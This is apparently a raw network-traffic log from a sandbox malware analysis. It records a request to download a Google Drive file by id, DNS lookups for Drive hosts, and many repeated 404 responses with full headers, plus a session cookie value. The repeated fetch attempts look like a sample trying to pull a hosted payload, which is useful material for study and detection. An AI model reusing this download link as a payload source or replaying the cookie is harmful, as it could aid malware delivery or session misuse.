    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTBooCx_HrtJC3dg5lWi0qpxqYt1SJrNXd72GCuoigbkGjPBUDAxsHkQUQpyZECnBogContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:33 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wFy2sGQAm2wSFVrYWoRwbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb; expires=Sun, 13-Jul-2025 04:29:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRzeassAPrPqTtDI0EaN8RC2ufu6O8jkL6XiWWcIWXfkChYAV2RGftzfisi6M0ihpBrV-sZs4UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aXNXIr4DnQiNWYCr3ejh7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTZdeheKZn9JVpZuacOi6ApEAGnQOQGB0gK8y9XyaH5NkKrKYsmI5h_vm5TG_rcdgXTSii4tGgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ngv22eOXnR0dwv_YGuvWuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQyxB9-iB40u7xrRo_i8LHwzV7razK3VC4IJhk7L9XqBSadW9jYGCJqeFUofnNPSDnqFQ-iMQMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-tcqYqqwChqFINUHZo3dYOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT8zNwOpOZgE9eOuW7XP3yy5L6Y7NFcyKxKAd1nJKL_EmSex-Plm-rFbF1E2LQU9zeJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JN5pSnM8jJiEbYm1SGdy6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ3yQOrHQMalSwG_0AIfhTxgG81HYZADqgy2dDO4AfOELtZVX21LHohl1INOqm5E3eE_RAy7eEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-sCQUuUjZhEpY9O8Zx7PTeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgShivJ69ND35w3dJbu-kfuHY7HPtA2vpk3iP5ROtaXYfaeRrStXnKamEOy7XPkQyZfk5ENd6SEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7KwAU09EzDaMcOyRvIx1lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSeH1dNT61mN-VS3GHaYMELFq-9LTWkLHSh2GgvkPyB2eTqFfnXyp6lVVhAi4UWmy1TContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-4qJZgdpT07Uuhd1uYITnuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRCCopv9kcEaAbDGGMxs6w84S9siUxAMjN4r7LgbOLjQavjH8APpCnyk2R5pzZMJghNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:51 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fvsjmTXeHKtqQjIn6RSq5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTO5zPYZIhjM4ikLP9B8xuEOay9YnrXi71GJvViiT33y4MN_kz4N7sJd55KcRJGB1qcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:53 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jr1iZeOWVIKXrfKJpGwY-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTtEnrvsYf6N4wH7Tn1wvfpdoYW8SZCyEH0v86h4nPr5AInCNFwyEsq1Ry2hn5-Xv1XFzfZ5TYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:56 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-LMZkefaX489A_cu248nRag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRycPxdjWjyfs3Y3imVnVtWE0QqA965Ya9gWByXQywZCJBI0to3FyO8vZqIw2zN2LsmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-86CjWbfPz_SJt_iIsI_2VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTfaRMVSdz2I_gQteKH19D_xvJ5MwjHJD7p7nXwhrRrotKW5Yzz2cNADz6XOz7nde1OContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-XiBI2Keh8MFdGaBmt9OlbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTJn2Lurzj4IBV0yd5RWlijRFGqBXIyYF-wU4Fi3JYtjhdHX7enYZGRNS05WM6MnzBQDJX8ZhIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:30:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-jEN3criIUTNmSW7MN-8bvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 